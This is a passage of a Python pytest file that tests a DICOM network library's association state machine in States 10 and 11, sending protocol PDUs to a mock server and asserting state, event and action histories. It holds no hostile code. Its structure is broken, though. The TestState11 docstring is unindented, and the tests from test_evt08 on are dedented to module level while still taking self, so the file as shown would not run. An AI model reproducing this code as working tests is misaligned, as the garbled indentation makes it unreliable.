            ("send", a_release_rq), # collide
            ("send", a_associate_ac), # trigger event
            ("recv", None), # recv a-abort
            ("exit", None),
        ]
        self.scp = scp = self.start_server(commands)
        assoc, fsm = self.get_acceptor_assoc()
        self.move_to_state(assoc, scp)
        scp.step()
        scp.step()
        scp.step()
        scp.shutdown()
        assert fsm._transitions[:5] == ["Sta2", "Sta3", "Sta6", "Sta7", "Sta10"]
        assert fsm._changes[:6] == [
            ("Sta1", "Evt5", "AE-5"),
            ("Sta2", "Evt6", "AE-6"),
            ("Sta3", "Evt7", "AE-7"),
            ("Sta6", "Evt11", "AR-1"),
            ("Sta7", "Evt12", "AR-8"),
            ("Sta10", "Evt3", "AA-8"),
        ]
        assert fsm._events[:6] == ["Evt5", "Evt6", "Evt7", "Evt11", "Evt12", "Evt3"]
        # Server's third receive is the A-ABORT PDU emitted by AA-8
        assert scp.handlers[0].received[2] == (
            b"\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00"
        )

    def test_evt04(self):
        """Test Sta10 + Evt4."""
        # Sta10 + Evt4 -> AA-8 -> Sta13
        # Evt4: Receive A-ASSOCIATE-RJ PDU from <remote>
        # AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
        commands = [
            ("send", a_associate_rq),
            ("recv", None), # recv a-associate-ac
            ("recv", None), # recv a-release-rq
            ("send", a_release_rq), # collide
            ("send", a_associate_rj), # trigger event
            ("recv", None), # recv a-abort
            ("exit", None),
        ]
        self.scp = scp = self.start_server(commands)
        assoc, fsm = self.get_acceptor_assoc()
        self.move_to_state(assoc, scp)
        scp.step()
        scp.step()
        scp.step()
        scp.shutdown()
        assert fsm._transitions[:5] == ["Sta2", "Sta3", "Sta6", "Sta7", "Sta10"]
        assert fsm._changes[:6] == [
            ("Sta1", "Evt5", "AE-5"),
            ("Sta2", "Evt6", "AE-6"),
            ("Sta3", "Evt7", "AE-7"),
            ("Sta6", "Evt11", "AR-1"),
            ("Sta7", "Evt12", "AR-8"),
            ("Sta10", "Evt4", "AA-8"),
        ]
        assert fsm._events[:6] == ["Evt5", "Evt6", "Evt7", "Evt11", "Evt12", "Evt4"]
        # Server's third receive is the A-ABORT PDU emitted by AA-8
        assert scp.handlers[0].received[2] == (
            b"\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00"
        )

    @pytest.mark.skip()
    def test_evt05(self):
        """Test Sta10 + Evt5."""
        # Sta10 + Evt5 -> <ignore> -> Sta10
        # Evt5: Receive TRANSPORT_INDICATION from <transport service>
        pass

    def test_evt06(self):
        """Test Sta10 + Evt6."""
        # Sta10 + Evt6 -> AA-8 -> Sta13
        # Evt6: Receive A-ASSOCIATE-RQ PDU from <remote>
        # AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
        commands = [
            ("send", a_associate_rq),
            ("recv", None), # recv a-associate-ac
            ("recv", None), # recv a-release-rq
            ("send", a_release_rq), # collide
            ("send", a_associate_rq), # trigger event
            ("recv", None), # recv a-abort
            ("exit", None),
        ]
        self.scp = scp = self.start_server(commands)
        assoc, fsm = self.get_acceptor_assoc()
        self.move_to_state(assoc, scp)
        scp.step()
        scp.step()
        scp.step()
        scp.shutdown()
        assert fsm._transitions[:5] == ["Sta2", "Sta3", "Sta6", "Sta7", "Sta10"]
        assert fsm._changes[:6] == [
            ("Sta1", "Evt5", "AE-5"),
            ("Sta2", "Evt6", "AE-6"),
            ("Sta3", "Evt7", "AE-7"),
            ("Sta6", "Evt11", "AR-1"),
            ("Sta7", "Evt12", "AR-8"),
            ("Sta10", "Evt6", "AA-8"),
        ]
        assert fsm._events[:6] == ["Evt5", "Evt6", "Evt7", "Evt11", "Evt12", "Evt6"]
        # Server's third receive is the A-ABORT PDU emitted by AA-8
        assert scp.handlers[0].received[2] == (
            b"\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00"
        )

    def test_evt07(self):
        """Test Sta10 + Evt7."""
        # Sta10 + Evt7 -> <ignore> -> Sta10
        # Evt7: Receive A-ASSOCIATE (accept) primitive from <local user>
        commands = [
            ("send", a_associate_rq),
            ("recv", None), # recv a-associate-ac
            ("recv", None), # recv a-release-rq
            ("send", a_release_rq), # collide
            ("exit", None),
        ]
        self.scp = scp = self.start_server(commands)
        assoc, fsm = self.get_acceptor_assoc()
        self.move_to_state(assoc, scp)
        assoc.dul.send_pdu(self.get_associate("accept"))
        scp.step()
        scp.shutdown()
        assert fsm._transitions[:5] == ["Sta2", "Sta3", "Sta6", "Sta7", "Sta10"]
        assert fsm._changes[:5] == [
            ("Sta1", "Evt5", "AE-5"),
            ("Sta2", "Evt6", "AE-6"),
            ("Sta3", "Evt7", "AE-7"),
            ("Sta6", "Evt11", "AR-1"),
            ("Sta7", "Evt12", "AR-8"),
        ]
        assert fsm._events[:6] == ["Evt5", "Evt6", "Evt7", "Evt11", "Evt12", "Evt7"]

    def test_evt08(self):
        """Test Sta10 + Evt8."""
        # Sta10 + Evt8 -> <ignore> -> Sta10
        # Evt8: Receive A-ASSOCIATE (reject) primitive from <local user>
        commands = [
            ("send", a_associate_rq),
            ("recv", None), # recv a-associate-ac
            ("recv", None), # recv a-release-rq
            ("send", a_release_rq), # collide
            ("exit", None),
        ]
        self.scp = scp = self.start_server(commands)
        assoc, fsm = self.get_acceptor_assoc()
        self.move_to_state(assoc, scp)
        assoc.dul.send_pdu(self.get_associate("reject"))
        scp.step()
        scp.shutdown()
        assert fsm._transitions[:5] == ["Sta2", "Sta3", "Sta6", "Sta7", "Sta10"]
        assert fsm._changes[:5] == [
            ("Sta1", "Evt5", "AE-5"),
            ("Sta2", "Evt6", "AE-6"),
            ("Sta3", "Evt7", "AE-7"),
            ("Sta6", "Evt11", "AR-1"),
            ("Sta7", "Evt12", "AR-8"),
        ]
        assert fsm._events[:6] == ["Evt5", "Evt6", "Evt7", "Evt11", "Evt12", "Evt8"]

    def test_evt09(self):
        """Test Sta10 + Evt9."""
        # Sta10 + Evt9 -> <ignore> -> Sta10
        # Evt9: Receive P-DATA primitive from <local user>
        commands = [
            ("send", a_associate_rq),
            ("recv", None), # recv a-associate-ac
            ("recv", None), # recv a-release-rq
            ("send", a_release_rq), # collide
            ("exit", None),
        ]
        self.scp = scp = self.start_server(commands)
        assoc, fsm = self.get_acceptor_assoc()
        self.move_to_state(assoc, scp)
        assoc.dul.send_pdu(self.get_pdata())
        scp.step()
        scp.shutdown()
        assert fsm._transitions[:5] == ["Sta2", "Sta3", "Sta6", "Sta7", "Sta10"]
        assert fsm._changes[:5] == [
            ("Sta1", "Evt5", "AE-5"),
            ("Sta2", "Evt6", "AE-6"),
            ("Sta3", "Evt7", "AE-7"),
            ("Sta6", "Evt11", "AR-1"),
            ("Sta7", "Evt12", "AR-8"),
        ]
        assert fsm._events[:6] == ["Evt5", "Evt6", "Evt7", "Evt11", "Evt12", "Evt9"]

    def test_evt10(self):
        """Test Sta10 + Evt10."""
        # Sta10 + Evt10 -> AA-8 -> Sta13
        # Evt10: Receive P-DATA-TF PDU from <remote>
        # AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
        commands = [
            ("send", a_associate_rq),
            ("recv", None), # recv a-associate-ac
            ("recv", None), # recv a-release-rq
            ("send", a_release_rq), # collide
            ("send", p_data_tf), # trigger event
            ("recv", None), # recv a-abort
            ("exit", None),
        ]
        self.scp = scp = self.start_server(commands)
        assoc, fsm = self.get_acceptor_assoc()
        self.move_to_state(assoc, scp)
        scp.step()
        scp.step()
        scp.step()
        scp.shutdown()
        assert fsm._transitions[:5] == ["Sta2", "Sta3", "Sta6", "Sta7", "Sta10"]
        assert fsm._changes[:6] == [
            ("Sta1", "Evt5", "AE-5"),
            ("Sta2", "Evt6", "AE-6"),
            ("Sta3", "Evt7", "AE-7"),
            ("Sta6", "Evt11", "AR-1"),
            ("Sta7", "Evt12", "AR-8"),
            ("Sta10", "Evt10", "AA-8"),
        ]
        assert fsm._events[:6] == ["Evt5", "Evt6", "Evt7", "Evt11", "Evt12", "Evt10"]
        # Server's third receive is the A-ABORT PDU emitted by AA-8
        assert scp.handlers[0].received[2] == (
            b"\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00"
        )

    def test_evt11(self):
        """Test Sta10 + Evt11."""
        # Sta10 + Evt11 -> <ignore> -> Sta10
        # Evt11: Receive A-RELEASE (rq) primitive from <local user>
        commands = [
            ("send", a_associate_rq),
            ("recv", None), # recv a-associate-ac
            ("recv", None), # recv a-release-rq
            ("send", a_release_rq), # collide
            ("exit", None),
        ]
        self.scp = scp = self.start_server(commands)
        assoc, fsm = self.get_acceptor_assoc()
        self.move_to_state(assoc, scp)
        assoc.dul.send_pdu(self.get_release(False))
        scp.step()
        scp.shutdown()
        assert fsm._transitions[:5] == ["Sta2", "Sta3", "Sta6", "Sta7", "Sta10"]
        assert fsm._changes[:5] == [
            ("Sta1", "Evt5", "AE-5"),
            ("Sta2", "Evt6", "AE-6"),
            ("Sta3", "Evt7", "AE-7"),
            ("Sta6", "Evt11", "AR-1"),
            ("Sta7", "Evt12", "AR-8"),
        ]
        assert fsm._events[:6] == ["Evt5", "Evt6", "Evt7", "Evt11", "Evt12", "Evt11"]

    def test_evt12(self):
        """Test Sta10 + Evt12."""
        # Sta10 + Evt12 -> AA-8 -> Sta13
        # Evt12: Receive A-RELEASE-RQ PDU from <remote>
        # AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
        commands = [
            ("send", a_associate_rq),
            ("recv", None), # recv a-associate-ac
            ("recv", None), # recv a-release-rq
            ("send", a_release_rq), # collide
            ("send", a_release_rq), # trigger event
            ("recv", None), # recv a-abort
            ("exit", None),
        ]
        self.scp = scp = self.start_server(commands)
        assoc, fsm = self.get_acceptor_assoc()
        self.move_to_state(assoc, scp)
        scp.step()
        scp.step()
        scp.step()
        scp.shutdown()
        assert fsm._transitions[:5] == ["Sta2", "Sta3", "Sta6", "Sta7", "Sta10"]
        assert fsm._changes[:6] == [
            ("Sta1", "Evt5", "AE-5"),
            ("Sta2", "Evt6", "AE-6"),
            ("Sta3", "Evt7", "AE-7"),
            ("Sta6", "Evt11", "AR-1"),
            ("Sta7", "Evt12", "AR-8"),
            ("Sta10", "Evt12", "AA-8"),
        ]
        assert fsm._events[:6] == ["Evt5", "Evt6", "Evt7", "Evt11", "Evt12", "Evt12"]
        # Server's third receive is the A-ABORT PDU emitted by AA-8
        assert scp.handlers[0].received[2] == (
            b"\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00"
        )

    def test_evt13(self):
        """Test Sta10 + Evt13."""
        # Sta10 + Evt13 -> AR-10 -> Sta13
        # Evt13: Receive A-RELEASE-RP PDU from <remote>
        # AR-10: Issue A-RELEASE (rp) primitive
        commands = [
            ("send", a_associate_rq),
            ("recv", None), # recv a-associate-ac
            ("recv", None), # recv a-release-rq
            ("send", a_release_rq), # collide
            ("send", a_release_rp), # trigger event
            ("exit", None),
        ]
        self.scp = scp = self.start_server(commands)
        assoc, fsm = self.get_acceptor_assoc()
        self.move_to_state(assoc, scp)
        scp.step()
        scp.step()
        scp.shutdown()
        assert fsm._transitions[:5] == ["Sta2", "Sta3", "Sta6", "Sta7", "Sta10"]
        assert fsm._changes[:6] == [
            ("Sta1", "Evt5", "AE-5"),
            ("Sta2", "Evt6", "AE-6"),
            ("Sta3", "Evt7", "AE-7"),
            ("Sta6", "Evt11", "AR-1"),
            ("Sta7", "Evt12", "AR-8"),
            ("Sta10", "Evt13", "AR-10"),
        ]
        assert fsm._events[:6] == ["Evt5", "Evt6", "Evt7", "Evt11", "Evt12", "Evt13"]

    def test_evt14(self):
        """Test Sta10 + Evt14."""
        # Sta10 + Evt14 -> <ignore> -> Sta10
        # Evt14: Receive A-RELEASE (rsp) primitive from <local user>
        commands = [
            ("send", a_associate_rq),
            ("recv", None), # recv a-associate-ac
            ("recv", None), # recv a-release-rq
            ("send", a_release_rq), # collide
            ("exit", None),
        ]
        self.scp = scp = self.start_server(commands)
        assoc, fsm = self.get_acceptor_assoc()
        self.move_to_state(assoc, scp)
        assoc.dul.send_pdu(self.get_release(True))
        scp.step()
        scp.shutdown()
        assert fsm._transitions[:5] == ["Sta2", "Sta3", "Sta6", "Sta7", "Sta10"]
        assert fsm._changes[:5] == [
            ("Sta1", "Evt5", "AE-5"),
            ("Sta2", "Evt6", "AE-6"),
            ("Sta3", "Evt7", "AE-7"),
            ("Sta6", "Evt11", "AR-1"),
            ("Sta7", "Evt12", "AR-8"),
        ]
        assert fsm._events[:6] == ["Evt5", "Evt6", "Evt7", "Evt11", "Evt12", "Evt14"]

    def test_evt15(self):
        """Test Sta10 + Evt15."""
        # Sta10 + Evt15 -> AA-1 -> Sta13
        # Evt15: Receive A-ABORT (rq) primitive from <local user>
        # AA-1: Send A-ABORT PDU to <remote>, start ARTIM
        commands = [
            ("send", a_associate_rq),
            ("recv", None), # recv a-associate-ac
            ("recv", None), # recv a-release-rq
            ("send", a_release_rq), # collide
            ("recv", None), # recv a-abort
            ("exit", None),
        ]
        self.scp = scp = self.start_server(commands)
        assoc, fsm = self.get_acceptor_assoc()
        self.move_to_state(assoc, scp)
        assoc.dul.send_pdu(self.get_abort())
        scp.step()
        scp.step()
        scp.shutdown()
        assert fsm._transitions[:5] == ["Sta2", "Sta3", "Sta6", "Sta7", "Sta10"]
        assert fsm._changes[:6] == [
            ("Sta1", "Evt5", "AE-5"),
            ("Sta2", "Evt6", "AE-6"),
            ("Sta3", "Evt7", "AE-7"),
            ("Sta6", "Evt11", "AR-1"),
            ("Sta7", "Evt12", "AR-8"),
            ("Sta10", "Evt15", "AA-1"),
        ]
        assert fsm._events[:6] == ["Evt5", "Evt6", "Evt7", "Evt11", "Evt12", "Evt15"]
        # Server's third receive is the A-ABORT PDU emitted by AA-1
        assert scp.handlers[0].received[2] == (
            b"\x07\x00\x00\x00\x00\x04\x00\x00\x00\x00"
        )

    def test_evt16(self):
        """Test Sta10 + Evt16."""
        # Sta10 + Evt16 -> AA-3 -> Sta1
        # Evt16: Receive A-ABORT PDU from <remote>
        # AA-3: Issue A-ABORT or A-P-ABORT primitive, close connection
        commands = [
            ("send", a_associate_rq),
            ("recv", None), # recv a-associate-ac
            ("recv", None), # recv a-release-rq
            ("send", a_release_rq), # collide
            ("send", a_abort), # trigger event
            ("exit", None),
        ]
        self.scp = scp = self.start_server(commands)
        assoc, fsm = self.get_acceptor_assoc()
        self.move_to_state(assoc, scp)
        scp.step()
        scp.step()
        scp.shutdown()
        assert fsm._transitions[:5] == ["Sta2", "Sta3", "Sta6", "Sta7", "Sta10"]
        assert fsm._changes[:6] == [
            ("Sta1", "Evt5", "AE-5"),
            ("Sta2", "Evt6", "AE-6"),
            ("Sta3", "Evt7", "AE-7"),
            ("Sta6", "Evt11", "AR-1"),
            ("Sta7", "Evt12", "AR-8"),
            ("Sta10", "Evt16", "AA-3"),
        ]
        assert fsm._events[:6] == ["Evt5", "Evt6", "Evt7", "Evt11", "Evt12", "Evt16"]

    def test_evt17(self):
        """Test Sta10 + Evt17."""
        # Sta10 + Evt17 -> AA-4 -> Sta1
        # Evt17: Receive TRANSPORT_CLOSED from <transport service>
        # AA-4: Issue A-P-ABORT primitive
        commands = [
            ("send", a_associate_rq),
            ("recv", None), # recv a-associate-ac
            ("recv", None), # recv a-release-rq
            ("send", a_release_rq), # collide
            ("exit", None),
        ]
        self.scp = scp = self.start_server(commands)
        assoc, fsm = self.get_acceptor_assoc()
        self.move_to_state(assoc, scp)
        scp.step()
        scp.shutdown()
        # Brief pause so the local side can observe the closed transport
        time.sleep(0.5)
        assert fsm._transitions[:5] == ["Sta2", "Sta3", "Sta6", "Sta7", "Sta10"]
        assert fsm._changes[:6] == [
            ("Sta1", "Evt5", "AE-5"),
            ("Sta2", "Evt6", "AE-6"),
            ("Sta3", "Evt7", "AE-7"),
            ("Sta6", "Evt11", "AR-1"),
            ("Sta7", "Evt12", "AR-8"),
            ("Sta10", "Evt17", "AA-4"),
        ]
        assert fsm._events[:6] == ["Evt5", "Evt6", "Evt7", "Evt11", "Evt12", "Evt17"]

    def test_evt18(self):
        """Test Sta10 + Evt18."""
        # Sta10 + Evt18 -> <ignore> -> Sta10
        # Evt18: ARTIM timer expired from <local service>
        commands = [
            ("send", a_associate_rq),
            ("recv", None), # recv a-associate-ac
            ("recv", None), # recv a-release-rq
            ("send", a_release_rq), # collide
            ("exit", None),
        ]
        self.scp = scp = self.start_server(commands)
        assoc, fsm = self.get_acceptor_assoc()
        self.move_to_state(assoc, scp)
        # Force a quick ARTIM expiry while sitting in Sta10
        assoc.dul.artim_timer.timeout = 0.05
        assoc.dul.artim_timer.start()
        time.sleep(0.5)
        scp.step()
        scp.shutdown()
        assert fsm._transitions[:5] == ["Sta2", "Sta3", "Sta6", "Sta7", "Sta10"]
        assert fsm._changes[:5] == [
            ("Sta1", "Evt5", "AE-5"),
            ("Sta2", "Evt6", "AE-6"),
            ("Sta3", "Evt7", "AE-7"),
            ("Sta6", "Evt11", "AR-1"),
            ("Sta7", "Evt12", "AR-8"),
        ]
        assert fsm._events[:6] == ["Evt5", "Evt6", "Evt7", "Evt11", "Evt12", "Evt18"]

    def test_evt19(self):
        """Test Sta10 + Evt19."""
        # Sta10 + Evt19 -> AA-8 -> Sta13
        # Evt19: Received unrecognised or invalid PDU from <remote>
        # AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
        commands = [
            ("send", a_associate_rq),
            ("recv", None), # recv a-associate-ac
            ("recv", None), # recv a-release-rq
            ("send", a_release_rq), # collide
            ("send", b"\x08\x00\x00\x00\x00\x00\x00\x00"), # trigger event
            # NOTE(review): sibling tests pass None as the recv payload; the
            # a_abort argument here appears to be unused by the harness — confirm
            ("recv", a_abort), # recv a-abort
            ("exit", None),
        ]
        self.scp = scp = self.start_server(commands)
        assoc, fsm = self.get_acceptor_assoc()
        self.move_to_state(assoc, scp)
        scp.step()
        scp.step()
        scp.step()
        scp.shutdown()
        assert fsm._transitions[:5] == ["Sta2", "Sta3", "Sta6", "Sta7", "Sta10"]
        assert fsm._changes[:6] == [
            ("Sta1", "Evt5", "AE-5"),
            ("Sta2", "Evt6", "AE-6"),
            ("Sta3", "Evt7", "AE-7"),
            ("Sta6", "Evt11", "AR-1"),
            ("Sta7", "Evt12", "AR-8"),
            ("Sta10", "Evt19", "AA-8"),
        ]
        assert fsm._events[:6] == ["Evt5", "Evt6", "Evt7", "Evt11", "Evt12", "Evt19"]
        # Server's third receive is the A-ABORT PDU emitted by AA-8
        assert scp.handlers[0].received[2] == (
            b"\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00"
        )
@pytest.mark.filterwarnings("ignore:.*:pytest.PytestUnhandledThreadExceptionWarning")
class TestState11(TestStateBase):
"""Tests for State 11: Release collision req - awaiting A-RELEASE-RP PDU"""
    def move_to_state(self, assoc, scp):
        """Drive the requestor's FSM into Sta11 via a release collision."""
        def is_release_requested():
            """Override ACSE.is_release_requested."""
            return False

        # Prevent the ACSE from consuming the peer's release request itself
        assoc.acse.is_release_requested = is_release_requested
        assoc.start()
        scp.step()
        scp.step()
        self.wait_on_state(assoc.dul.state_machine, "Sta6")
        # Local release request crosses the peer's -> collision -> Sta9
        assoc.dul.send_pdu(self.get_release(False))
        scp.step()
        scp.step()
        self.wait_on_state(assoc.dul.state_machine, "Sta9")
        # Responding to the collided release moves the requestor to Sta11
        assoc.dul.send_pdu(self.get_release(True))
        self.wait_on_state(assoc.dul.state_machine, "Sta11")
    def test_evt01(self):
        """Test Sta11 + Evt1."""
        # Sta11 + Evt1 -> <ignore> -> Sta11
        # Evt1: A-ASSOCIATE (rq) primitive from <local user>
        commands = [
            ("recv", None),
            ("send", a_associate_ac),
            ("recv", None),
            ("send", a_release_rq),
            ("recv", None),
            ("exit", None),
        ]
        self.scp = scp = self.start_server(commands)
        # Reach Sta11 (collision + local release response), then fire Evt1.
        self.move_to_state(self.assoc, scp)
        self.assoc.dul.send_pdu(self.get_associate("request"))
        scp.step()
        scp.step()
        scp.shutdown()
        assert self.fsm._changes[:6] == [
            ("Sta1", "Evt1", "AE-1"),
            ("Sta4", "Evt2", "AE-2"),
            ("Sta5", "Evt3", "AE-3"),
            ("Sta6", "Evt11", "AR-1"),
            ("Sta7", "Evt12", "AR-8"),
            ("Sta9", "Evt14", "AR-9"),
        ]
        assert self.fsm._transitions[:6] == [
            "Sta4",
            "Sta5",
            "Sta6",
            "Sta7",
            "Sta9",
            "Sta11",
        ]
        assert self.fsm._events[:7] == [
            "Evt1",
            "Evt2",
            "Evt3",
            "Evt11",
            "Evt12",
            "Evt14",
            "Evt1",
        ]
    @pytest.mark.skip()
    def test_evt02(self):
        """Test Sta11 + Evt2."""
        # Sta11 + Evt2 -> <ignore> -> Sta11
        # Evt2: Receive TRANSPORT_OPEN from <transport service>
        # Skipped: presumably a TRANSPORT_OPEN cannot be produced on an
        # already-established association — confirm against the test harness.
        pass
    def test_evt03(self):
        """Test Sta11 + Evt3."""
        # Sta11 + Evt3 -> AA-8 -> Sta13
        # Evt3: Receive A-ASSOCIATE-AC PDU from <remote>
        # AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
        commands = [
            ("recv", None),
            ("send", a_associate_ac),
            ("recv", None),
            ("send", a_release_rq),
            ("recv", None),
            ("send", a_associate_ac),
            ("recv", None),
            ("exit", None),
        ]
        self.scp = scp = self.start_server(commands)
        # Reach Sta11, then let the server send the out-of-sequence PDU.
        self.move_to_state(self.assoc, scp)
        scp.step()
        scp.step()
        scp.step()
        scp.step()
        scp.shutdown()
        assert self.fsm._changes[:7] == [
            ("Sta1", "Evt1", "AE-1"),
            ("Sta4", "Evt2", "AE-2"),
            ("Sta5", "Evt3", "AE-3"),
            ("Sta6", "Evt11", "AR-1"),
            ("Sta7", "Evt12", "AR-8"),
            ("Sta9", "Evt14", "AR-9"),
            ("Sta11", "Evt3", "AA-8"),
        ]
        assert self.fsm._transitions[:6] == [
            "Sta4",
            "Sta5",
            "Sta6",
            "Sta7",
            "Sta9",
            "Sta11",
        ]
        assert self.fsm._events[:7] == [
            "Evt1",
            "Evt2",
            "Evt3",
            "Evt11",
            "Evt12",
            "Evt14",
            "Evt3",
        ]
    def test_evt04(self):
        """Test Sta11 + Evt4."""
        # Sta11 + Evt4 -> AA-8 -> Sta13
        # Evt4: Receive A-ASSOCIATE-RJ PDU from <remote>
        # AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
        commands = [
            ("recv", None),
            ("send", a_associate_ac),
            ("recv", None),
            ("send", a_release_rq),
            ("recv", None),
            ("send", a_associate_rj),
            ("recv", None),
            ("exit", None),
        ]
        self.scp = scp = self.start_server(commands)
        # Reach Sta11, then let the server send the out-of-sequence PDU.
        self.move_to_state(self.assoc, scp)
        scp.step()
        scp.step()
        scp.step()
        scp.step()
        scp.shutdown()
        assert self.fsm._changes[:7] == [
            ("Sta1", "Evt1", "AE-1"),
            ("Sta4", "Evt2", "AE-2"),
            ("Sta5", "Evt3", "AE-3"),
            ("Sta6", "Evt11", "AR-1"),
            ("Sta7", "Evt12", "AR-8"),
            ("Sta9", "Evt14", "AR-9"),
            ("Sta11", "Evt4", "AA-8"),
        ]
        assert self.fsm._transitions[:6] == [
            "Sta4",
            "Sta5",
            "Sta6",
            "Sta7",
            "Sta9",
            "Sta11",
        ]
        assert self.fsm._events[:7] == [
            "Evt1",
            "Evt2",
            "Evt3",
            "Evt11",
            "Evt12",
            "Evt14",
            "Evt4",
        ]
    @pytest.mark.skip()
    def test_evt05(self):
        """Test Sta11 + Evt5."""
        # Sta11 + Evt5 -> <ignore> -> Sta11
        # Evt5: Receive TRANSPORT_INDICATION from <transport service>
        # Skipped: presumably a TRANSPORT_INDICATION cannot be produced on an
        # already-established association — confirm against the test harness.
        pass
    def test_evt06(self):
        """Test Sta11 + Evt6."""
        # Sta11 + Evt6 -> AA-8 -> Sta13
        # Evt6: Receive A-ASSOCIATE-RQ PDU from <remote>
        # AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
        commands = [
            ("recv", None),
            ("send", a_associate_ac),
            ("recv", None),
            ("send", a_release_rq),
            ("recv", None),
            ("send", a_associate_rq),
            ("recv", None),
            ("exit", None),
        ]
        self.scp = scp = self.start_server(commands)
        # Reach Sta11, then let the server send the out-of-sequence PDU.
        self.move_to_state(self.assoc, scp)
        scp.step()
        scp.step()
        scp.step()
        scp.step()
        scp.shutdown()
        assert self.fsm._changes[:7] == [
            ("Sta1", "Evt1", "AE-1"),
            ("Sta4", "Evt2", "AE-2"),
            ("Sta5", "Evt3", "AE-3"),
            ("Sta6", "Evt11", "AR-1"),
            ("Sta7", "Evt12", "AR-8"),
            ("Sta9", "Evt14", "AR-9"),
            ("Sta11", "Evt6", "AA-8"),
        ]
        assert self.fsm._transitions[:6] == [
            "Sta4",
            "Sta5",
            "Sta6",
            "Sta7",
            "Sta9",
            "Sta11",
        ]
        assert self.fsm._events[:7] == [
            "Evt1",
            "Evt2",
            "Evt3",
            "Evt11",
            "Evt12",
            "Evt14",
            "Evt6",
        ]
    def test_evt07(self):
        """Test Sta11 + Evt7."""
        # Sta11 + Evt7 -> <ignore> -> Sta11
        # Evt7: Receive A-ASSOCIATE (accept) primitive from <local user>
        commands = [
            ("recv", None),
            ("send", a_associate_ac),
            ("recv", None),
            ("send", a_release_rq),
            ("recv", None),
            ("exit", None),
        ]
        self.scp = scp = self.start_server(commands)
        # Reach Sta11, then fire the local primitive; it should be ignored.
        self.move_to_state(self.assoc, scp)
        self.assoc.dul.send_pdu(self.get_associate("accept"))
        scp.step()
        scp.step()
        scp.shutdown()
        assert self.fsm._changes[:6] == [
            ("Sta1", "Evt1", "AE-1"),
            ("Sta4", "Evt2", "AE-2"),
            ("Sta5", "Evt3", "AE-3"),
            ("Sta6", "Evt11", "AR-1"),
            ("Sta7", "Evt12", "AR-8"),
            ("Sta9", "Evt14", "AR-9"),
        ]
        assert self.fsm._transitions[:6] == [
            "Sta4",
            "Sta5",
            "Sta6",
            "Sta7",
            "Sta9",
            "Sta11",
        ]
        assert self.fsm._events[:7] == [
            "Evt1",
            "Evt2",
            "Evt3",
            "Evt11",
            "Evt12",
            "Evt14",
            "Evt7",
        ]
def test_evt08(self):
    """Test Sta11 + Evt8."""
    # Sta11 + Evt8 -> <ignore> -> Sta11
    # Evt8: Receive A-ASSOCIATE (reject) primitive from <local user>
    commands = [
        ("recv", None),  # recv a-associate-rq
        ("send", a_associate_ac),
        ("recv", None),  # recv a-release-rq
        ("send", a_release_rq),  # collide
        ("recv", None),  # recv a-release-rp
        ("exit", None),
    ]
    self.scp = scp = self.start_server(commands)

    # Drive the requestor through the release collision into Sta11
    self.move_to_state(self.assoc, scp)
    # Trigger Evt8; ignored in Sta11, so no new (state, event, action) entry
    self.assoc.dul.send_pdu(self.get_associate("reject"))
    scp.step()
    scp.step()
    scp.shutdown()

    assert self.fsm._changes[:6] == [
        ("Sta1", "Evt1", "AE-1"),
        ("Sta4", "Evt2", "AE-2"),
        ("Sta5", "Evt3", "AE-3"),
        ("Sta6", "Evt11", "AR-1"),
        ("Sta7", "Evt12", "AR-8"),
        ("Sta9", "Evt14", "AR-9"),
    ]
    assert self.fsm._transitions[:6] == [
        "Sta4",
        "Sta5",
        "Sta6",
        "Sta7",
        "Sta9",
        "Sta11",
    ]
    # The ignored event is still logged in the event history
    assert self.fsm._events[:7] == [
        "Evt1",
        "Evt2",
        "Evt3",
        "Evt11",
        "Evt12",
        "Evt14",
        "Evt8",
    ]
def test_evt09(self):
    """Test Sta11 + Evt9."""
    # Sta11 + Evt9 -> <ignore> -> Sta11
    # Evt9: Receive P-DATA primitive from <local user>
    commands = [
        ("recv", None),  # recv a-associate-rq
        ("send", a_associate_ac),
        ("recv", None),  # recv a-release-rq
        ("send", a_release_rq),  # collide
        ("recv", None),  # recv a-release-rp
        ("exit", None),
    ]
    self.scp = scp = self.start_server(commands)

    # Drive the requestor through the release collision into Sta11
    self.move_to_state(self.assoc, scp)
    # Trigger Evt9; ignored in Sta11, so no new (state, event, action) entry
    self.assoc.dul.send_pdu(self.get_pdata())
    scp.step()
    scp.step()
    scp.shutdown()

    assert self.fsm._changes[:6] == [
        ("Sta1", "Evt1", "AE-1"),
        ("Sta4", "Evt2", "AE-2"),
        ("Sta5", "Evt3", "AE-3"),
        ("Sta6", "Evt11", "AR-1"),
        ("Sta7", "Evt12", "AR-8"),
        ("Sta9", "Evt14", "AR-9"),
    ]
    assert self.fsm._transitions[:6] == [
        "Sta4",
        "Sta5",
        "Sta6",
        "Sta7",
        "Sta9",
        "Sta11",
    ]
    # The ignored event is still logged in the event history
    assert self.fsm._events[:7] == [
        "Evt1",
        "Evt2",
        "Evt3",
        "Evt11",
        "Evt12",
        "Evt14",
        "Evt9",
    ]
def test_evt10(self):
    """Test Sta11 + Evt10."""
    # Sta11 + Evt10 -> AA-8 -> Sta13
    # Evt10: Receive P-DATA-TF PDU from <remote>
    # AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
    commands = [
        ("recv", None),  # recv a-associate-rq
        ("send", a_associate_ac),
        ("recv", None),  # recv a-release-rq
        ("send", a_release_rq),  # collide
        ("recv", None),  # recv a-release-rp
        ("send", p_data_tf),  # trigger Evt10 while in Sta11
        ("recv", None),  # recv a-abort (AA-8)
        ("exit", None),
    ]
    self.scp = scp = self.start_server(commands)

    # Drive the requestor through the release collision into Sta11
    self.move_to_state(self.assoc, scp)
    scp.step()
    scp.step()
    scp.step()
    scp.step()
    scp.shutdown()

    assert self.fsm._changes[:7] == [
        ("Sta1", "Evt1", "AE-1"),
        ("Sta4", "Evt2", "AE-2"),
        ("Sta5", "Evt3", "AE-3"),
